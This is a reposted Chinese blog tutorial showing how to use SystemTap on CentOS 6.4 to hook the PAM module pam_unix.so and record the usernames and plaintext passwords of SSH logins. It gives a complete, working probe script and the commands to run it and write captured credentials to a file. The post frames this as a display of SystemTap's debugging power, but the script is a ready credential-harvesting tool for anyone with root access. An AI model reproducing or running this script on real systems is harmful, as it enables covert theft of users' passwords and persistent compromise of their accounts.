使用systemtap抓取ssh登录的用户名和密码

systemtap是一款非常强大内核调试工具,可以debug很多关于kernel层的问题。Linux是通过PAM模块检测用户信息和认证信息的,从 而确定一个用户是否可以登录系统,利用这个知识点,使用systemtap捕获一下pam_unix.so该动态库文件的函数调用,获得用户在ssh远程 登录时的用户名和密码吧。 测试环境:CentOS6.4 32bit 内核版本:2.6.32-358.el6.i686 首先安装以下rpm包
# yum --releasever=6.4 update
# yum install -y systemtap
# debuginfo-install $(rpm -qf /lib/security/pam_unix.so)
创建文件,写入以下代码
# touch /root/capture_pass.stp
    #!/usr/bin/stap
    global username, pass, isSuccRet = 1;
    probe process("/lib/security/pam_unix.so").function("_unix_verify_password")
    {
    username = user_string($name);
    pass = user_string($p);
    }
    probe process("/lib/security/pam_unix.so").function("_unix_verify_password").return
    {
    if ($return == 0)
    {
    printf("User: %s\nPassword: %s\n\n", username, pass);
    isSuccRet = 0;
    }
    }
    probe process("/lib/security/pam_unix.so").function("pam_sm_open_session")
    {
    if (isSuccRet != 0)
    {
    printf("Login via ssh service.\n\User: %s\nPassword: %s\n\n", username, pass);
    }
    isSuccRet = 1;
    }
  赋予可执行权限 chmod +x capture_pass.stp 创建一个记录密码的文件 touch password.txt 执行systemstap脚本 stap capture_pass.stp -o password.txt 29242873_1385882712dzYh   本地执行capture_pass.stp脚本,同时ssh远程登录系统,即使第一次登录失败也没有问题,不会记录尝试输入的错误密码。登录成功后 ctl+C终止脚本运行,查看password.txt,成功捕获。systemstap很强大的利器,所以只有超户可以使用。 29242873_1385882732x060   转自:http://blog.chinaunix.net/uid-29242873-id-4018526.html  

转载于:https://my.oschina.net/766/blog/210907

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值